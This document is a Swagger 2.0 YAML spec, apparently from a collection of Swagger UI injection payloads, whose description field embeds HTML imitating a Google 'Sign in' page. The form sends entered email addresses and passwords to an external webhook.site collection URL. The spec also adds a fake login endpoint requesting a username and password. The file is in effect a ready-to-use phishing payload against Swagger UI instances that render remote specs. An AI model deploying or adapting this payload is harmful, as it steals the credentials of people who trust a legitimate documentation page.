swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger UI
  description: '<br><table width="100%" cellspacing="0" cellpadding="0"><tr><td width="30%">&nbsp;</td><td width="40%" bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="22"><tr><td align="left"><div align="center"><img src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/logo-google.png" width="110" height="30" alt="Google"></div><br><font face="Segoe UI" size="5" color="#1f1f1f"><b>Sign in</b></font><br><font face="Segoe UI" size="2" color="#1f1f1f">Use your Google Account</font><br><font face="Segoe UI" size="2" color="#444746">to continue to Google API Console</font><br><br><form action="https://webhook.site/REPLACE-ME" method="post"><font face="Segoe UI" size="2" color="#444746"><b>Email or phone</b></font><br><input type="text" name="email" size="34" placeholder="Email or phone"><br><br><font face="Segoe UI" size="2" color="#444746"><b>Password</b></font><br><input type="password" name="password" size="34" placeholder="Enter your password"><br><br><font face="Segoe UI" size="2" color="#0b57d0">Forgot password?</font><br><input type="image" src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/btn-google.png" width="100" height="29" alt="Next"></form></td></tr></table><table width="100%" cellspacing="0" cellpadding="3"><tr><td bgcolor="#f0f4f9">&nbsp;</td></tr></table><table width="100%" cellspacing="0" cellpadding="8"><tr><td align="left"><font face="Segoe UI" size="1" color="#444746">English (United States) &nbsp; Help &nbsp; Privacy &nbsp; Terms</font></td></tr></table></td><td width="30%">&nbsp;</td></tr></table><br>'
paths:
  /Login_Page:
    post:
      summary: Login here to continue
      description: Please provide your credentials to continue.
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      tags:
        - Click here to login
      responses:
        '200':
          description: OK
        '400':
          description: Bad request
        '500':
          description: Server error
